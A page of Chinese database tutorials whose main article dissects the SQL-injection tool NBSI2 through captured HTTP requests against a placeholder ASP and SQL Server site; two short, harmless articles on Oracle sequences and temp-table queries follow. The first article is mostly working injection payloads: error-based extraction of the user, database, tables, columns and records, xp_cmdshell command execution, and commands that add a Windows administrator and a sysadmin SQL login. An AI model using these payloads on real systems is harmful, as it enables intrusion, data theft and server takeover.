NBSI2内部功能实现大揭谜数据库教程

NBSI2内部功能实现大揭谜数据库教程（推荐3篇）由网友“冬半”投稿提供，以下是小编帮大家整理后的NBSI2内部功能实现大揭谜数据库教程，仅供参考，希望能够帮助到大家。

篇1：NBSI2内部功能实现大揭谜数据库教程

NBSI2内部功能实现大揭谜

前段时间SQL注入很流行，用过小竹的NB2的人可能都知道，这个工具接近无敌，菜鸟用了它也能数秒把一个站给黑了，但是不了解其中的注入过程 可以说永远都进步不了吧~~

首先声明，我也只是菜鸟一个，正好最近在研究SQL,随便把NB2的注入过程给研究了一个，所用工具wse,相信大家不会陌生的，网上到处有得下，我给一个地址，www.gxgl.com/soft/WSE06b1.zip，这是一个用来监视和修改网络发送和接收数据的程序，可以用来帮助您调试网络应用程序，

废话少说，开工，先在网上随便找一个有SQL注入漏洞得站点www.testdb.net，找到一个注射点：www.testdb.net/article_read.asp?id=80

呵呵，www.testdb.net这个网址当然是不存在了。

过程一、取得SQl Server数据库信息

打开nb2,输入地址：www.testdb.net/article_read.asp?id=80，选择“get”方式，点“检测”按钮，

取得SQl Server数据库得如下信息：

多句执行：未知

子查询：支持

当前用户：test

用户权限：DB_OWNER

当前库：testdb

用过nb2的人应该都很熟悉上面的内容把~~

%20解释为空格 %2B解释为+号，%25解释为%号

HTTP/1.1 200 OK     //返回成功

HTTP/1.1 500 Internal Server Error

用wse检测Get包信息，如下：

GET /article_read.asp?id=80 HTTP/1.1

GET /article_read.asp?id=80%20and%20user%2Bchar(124)=0 HTTP/1.1

即：article_read.asp?id=80 and user+char(124)=0

char(124)为字符'|'

GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1

即：article_read.asp?id=80;declare @a int--

//判断是否支持多句查询

GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: articleid=80%3Bdeclare+%40a+int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0

//判断是否支持子查询

GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And user+char(124)=0

//取得当前用户

user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将

nvarchar的值转成int型，转的过程中肯定会出错，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”east_asp” 转

换数据类型为 int 的列时发生语法错误，呵呵，east_asp正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。and user>0

GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)

=1 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

函数说明：

IS_SRVROLEMEMBER指明当前的用户登录是否是指定的服务器角色的成员。

语法

IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )

参数

'role' 被检查的服务器角色的名称。role 的数据类型为 sysname。

role 有效的值是： sysadmin,dbcreator,diskadmin,processadmin,serveradmin,etupadmin,securityadmin

'login'

将要检查的登录的可选名称。login 的数据类型为 sysname，默认值为 NULL。如果未指定，那么使用当前用户的登录帐户。

select Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124) 结果为“1|”

GET /article_read.asp?id=80%20And%20Cast(IS_MEMBER(0x64006F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1

HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1

select Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) 结果为“1|”,和上面得返回结果一样，但注意

IS_MEMBER里面的那一长字符串和上面的不一样，不知代表什么意思，0x730079007300610064006D0069006E00转化后为“|O|@ E ”，本以为

是“sysadmin”类似的字串，但看来不是，算了，不想了，呵呵，但我想，其作用应该是取得当前用户的权限把，如：DB_OWNER

GET /article_read.asp?id=80%20And%20db_name%2Bchar(124)=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And db_name()+char(124)=0

这一句，看到有一个db_name()函数，不用多说，大家应该知道了，db_name()是另一个系统变量，返回的是连接的数据库名。

到次，获取SQL数据库信息的过程算是分析完毕。

另：post方法不再详细分析，大家可自己看一下，下面是post方法时抓的包，具体同Get方法基本一样,主要看最后一行的信息。

其中也用到很多技巧：如下：

id=80%20and%20user%2Bchar(124)=0

id=80'%20and%20user%2Bchar(124)=0%20and%20''='

id=80%25'%20and%20user%2Bchar(124)=0%20and%20'%25'='

id=80%20And%201=1

id=80%20And%201=2

id=80'%20And%201=1%20And%20''='

id=80'%20And%201=2%20And%20''='

id=80%25'%20And%201=1%20And%20'%25'='

id=80%25'%20And%201=2%20And%20'%25'='

//////////////////////////////////////////////

过程二、猜解表名

Top1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

即：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from

[testdb]..[sysobjects] Where xtype=char(85) order by id) T order by id desc)>0

char(85)='U'

作用是取得testdb数据库第一个表的表名，以此类推Top N,可以取得其它的表名。

Top2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

...

TopN

wse抓获的包信息：

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

...........

//////////////////////////////////////////////

过程三、根据某个表名猜解列名

表名：article

Top1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

即：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From

[testdb]..[syscolumns] Where id = OBJECT_ID(NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+

NCHAR(116)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69))

Order by colid) T Order by colid desc)>0

作用是取得article表的第一个列的列名，以此类推Top N,可以取得其它的列名。

函数说明：

OBJECT_ID 返回数据库对象标识号。

语法 OBJECT_ID ( 'object' )

参数 'object'

要使用的对象。object 的数据类型为 char 或 nchar。如果 object 的数据类型是 char，那么隐性将其转换成 nchar。

返回类型 int

NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+NCHAR(116)+NCHAR(46)+

NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)

对应于字符串 testdb..ARTICLE

即是：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From

[testdb]..[syscolumns] Where id = OBJECT_ID('testdb..ARTICLE')

Order by colid) T Order by colid desc)>0

Top2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%202%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

TopN

...

wse抓获的包信息：

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

...............

//////////////////////////////////////////////

过程四、根据列名猜解字段内容

字段名:Title

Top1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%

20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20

[TITLE]%20desc)>0 HTTP/1.1

即：article_read.asp?id=80 And (Select Top 1 isNull(cast([TITLE] as varchar(8000)),char(32))+char(124)

From (Select Top 1 [TITLE] From [testdb]..[ARTICLE] Where 1=1 Order by [TITLE]) T Order by [TITLE] desc)>0

作用是取得TITLE字段的第一行记录的值，以此类推Top N,可以取得其它行的值，

Top2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%

20From%20(Select%20Top%202%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20

[TITLE]%20desc)>0 HTTP/1.1

TopN

...

wse抓获的包信息：

//取得article表的记录数

GET /article_read.asp?id=80%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[testdb]..[ARTICLE]%

20Where%201=1)>0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

//取得Article表的Title字段的第一条记录内容

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%

20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20

[TITLE]%20desc)>0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

...............

//////////////////////////////////////////////

到此，数据库的表名，字段名及字段内容的分析基本结束，再看一下其它主要功能的分析。

过程五、执行Dos命令和执行SQL语句

执行Dos命令 dir c:\

////////////////////////////////////////////////

回显抓包分析：

GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\%20>%20C:\NB_Commander_Txt.log';DROP%20TABLE%

20NB_Commander_Tmp;CREATE%20TABLE%20NB_Commander_Tmp(ResultTxt%20varchar(7996)%20NULL);BULK%20INSERT%20[testdb]..

[NB_Commander_Tmp]%20FROM%20'C:\NB_Commander_Txt.log'%20WITH%20(KEEPNULLS);Alter%20Table%20NB_Commander_Tmp%20add%20ID%

20int%20NOT%20NULL%20IDENTITY%20(1,1)-- HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

主要是这个：

article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\ >C:\NB_Commander_Txt.log';

DROP TABLE NB_Commander_Tmp;CREATE TABLE NB_Commander_Tmp(ResultTxt varchar(7996) NULL);

BULK INSERT [testdb]..[NB_Commander_Tmp] FROM 'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);

Alter Table NB_Commander_Tmp add ID int NOT NULL IDENTITY%20(1,1)--

BULK INSERT 以用户指定的格式复制一个数据文件至数据库表或视图中。

KEEPNULLS 指定在大容量复制操作中空列应保留一个空值，而不是对插入的列赋予默认值。

具体的详细介绍请查看T-sql语法，有详细说明。

上面语句的功能就是就是将执行Dos命令Dir c:\的结果保存到一个文件NB_Commander_Txt.log中，然后将此文件的内容写入到新建的临时表

NB_Commander_Tmp，并增加一个自增长字段ID，相信大家很容易看明白。

ID=1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%

2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=1)=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%

3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%

28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%

5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%

2D%2D

即：article_read.asp?id=80 And (Select Top 1 CASE WHEN ResultTxt is Null then '|' else ResultTxt+'|' End

From NB_Commander_Tmp Where ID=1)=0

输入第一条回显结果，以下同，TopN输入所有的回显结果。

ID=2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%

2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=2)=0 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%

3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%

28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%

5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%

2D%2D

ID=N

...............

输出显示：

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

[意外输出]

...

...

...

如果正常没有问题，会输出C:\下所有的文件，出现上面的提示，可能原因是数据表NB_Commander_Tmp没有创建成功，因此不能正确输出。

////////////////////////////////////////////////

不回显抓包分析：

Dos命令 Dir C:\

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\'-- HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP+TABLE+NB%5FCommander%5FTmp%3BEXEC+MASTER%2E%2EXP%

5FCMDSHELL+%27DEL+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%2D%2D

即：article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\'--

不需要显示输出结果。

输出显示：

命令执行完成

////////////////////////////////////////////////

Dos命令：

net user TsInternetUsers Password /add

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'net%20user%20TsInternetUsers%20Password%20/add'-- HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C%27%2D%2D

执行其它Dos命令都同上。

id=80;EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers Password /add'--

id=80;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers /add'--

执行SQL命令(同执行Dos命令)

GET /article_read.asp?id=80;exec%20master..sp_addlogin%20UserName,Password-- HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

User-Agent: Microsoft URL Control - 6.00.8862

Host: www.testdb.net

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%

27net+user+TsInternetUsers+Password+%2Fadd%27%2D%2D

id=80;exec master..sp_addlogin UserName,Password--

id=80;exec master..sp_addsrvrolemember UserName,sysadmin--

....

////////////////////////////////////////////////

到此，Nb2的主要功能分析完毕，其它的功能大家可以自己分析，第一次写这么长的文章，可能很乱，也一定存在不少问题，不过实在没有精力

去逐字修改了，希望大家能看明白。谢谢！

hnxyy(虚空)

/11/26 晚 10:30

篇2：如何在Oracle 中实现类似自动增加 ID 的功能?数据库教程

oracle

可以通过采取以下的功能实现自动增加ID的功能

1.首先创建 sequence

create sequence seqmax increment by 1

2.使用方法

select seqmax.nextval ID from dual

就得到了一个ID

如果把这个语句放在 触发器中，就可以实现    和 ms sql 的自动增加ID相同的功能！

篇3：两则实现相同功能的代码比较(使用临时表与不用临时表比较)数据库教程

比较|临时表

if (not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[old_outid]') and OBJECTPROPERTY(id, N'IsUserTable') = 1))

begin

select customerid,outid into old_outid from t_customers

--update t_customers set utid='请输入新的学工号'

/* --把新工号恢复成老工号值

UPDATE T_Customers

SET T_Customers.outid = old_outid.outid

FROM old_outid

WHERE old_outid.customerid = T_Customers.CustomerID

*/

end

select * into #dpt from (SELECT dpcode1+dpcode2+dpcode3 as 部门代码,dpname1+'/'+dpname2+'/'+dpname3 as 部门名称 FROM T_Department where dpname1 is not null and dpname2 is not null and dpname3 is not null union all SELECT dpcode1+dpcode2+dpcode3 as 部门代码,dpname1+'/'+dpname2 as 部门名称 FROM T_Department where dpname1 is not null and dpname2 is not null and dpname3 is null UNION ALL SELECT dpcode1+dpcode2+dpcode3 as 部门代码,dpname1 as 部门名称 FROM T_Department where dpname1 is not null and dpname2 is null and dpname3 is null) l

SELECT CustomerID, MAX(OpDt) AS 最近一次补卡时间 into #ReNewCard_MaxDt

FROM T_ReNewCard

GROUP BY CustomerID

SELECT 部门名称,Name AS 姓名, Alias AS 别名, CardType AS 卡类, c.outid AS 新工号,o.outid as 旧工号,最近一次补卡时间

FROM T_Customers c inner join #dpt d on d.部门代码=c.account inner join #ReNewCard_MaxDt r on

r.customerid=c.customerid inner join old_outid o on c.customerid=o.customerid

WHERE (c.CardType IN (1, 2))

drop table #dpt

drop table #ReNewCard_MaxDt

/* --作视图代码，功能同上，不便阅读理解与修改更新,但适用广，

两则实现相同功能的代码比较(使用临时表与不用临时表比较)数据库教程

，

SELECT d.部门名称, c.Name AS 姓名, c.Alias AS 别名, c.CardType AS 卡类,

c.outid AS 新工号, o.outid AS 旧工号, r.最近一次补卡时间

FROM T_Customers c INNER JOIN

(SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码,

dpname1 + '/' + dpname2 + '/' + dpname3 AS 部门名称

FROM T_Department

WHERE dpname1 IS NOT NULL AND dpname2 IS NOT NULL AND

dpname3 IS NOT NULL

UNION ALL

SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码,

dpname1 + '/' + dpname2 AS 部门名称

FROM T_Department

WHERE dpname1 IS NOT NULL AND dpname2 IS NOT NULL AND

dpname3 IS NULL

UNION ALL

SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码, dpname1 AS 部门名称

FROM T_Department

WHERE dpname1 IS NOT NULL AND dpname2 IS NULL AND dpname3 IS NULL)

d ON d.部门代码 = c.Account INNER JOIN

(SELECT CustomerID, MAX(OpDt) AS 最近一次补卡时间

FROM T_ReNewCard

GROUP BY CustomerID) r ON r.CustomerID = c.CustomerID INNER JOIN

old_outid o ON c.CustomerID = o.customerid

WHERE (c.CardType IN (1, 2))

*/

★ 辽宁沈阳怪坡导游词介绍

★ 沈阳怪坡导游词

★ 亭林先生文言文阅读答案

★ 《亭林先生神道表》的原文及阅读答案

★ win内置防火墙配置教程服务器教程

★ 防火墙在网络安全中的重要功能和作用服务器教程

★ 《最后的常春藤叶》的教案及反思

★ 服务器安全配置讲座[转]服务器教程

★ 单片机课程心得体会

★ 从零开始配置服务器服务器教程

《NBSI2内部功能实现大揭谜数据库教程.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

【NBSI2内部功能实现大揭谜数据库教程（推荐3篇）】相关文章：

单片机实验总结体会2023-01-18

建站优化系列教程：推广方法的选择2022-09-10

计算机基础知识的学习方法2023-05-16

电脑教程：以太网交换机如何搭建2022-10-25

WordPress标签(函数)参考指南2023-06-03

PS联系表功能介绍2023-01-30

计算机系毕业论文2023-02-13

Python中利用sorted函数排序的简单教程2022-07-17

摄影技术的学习方法2022-11-24

单片机实验报告的心得体会2022-05-28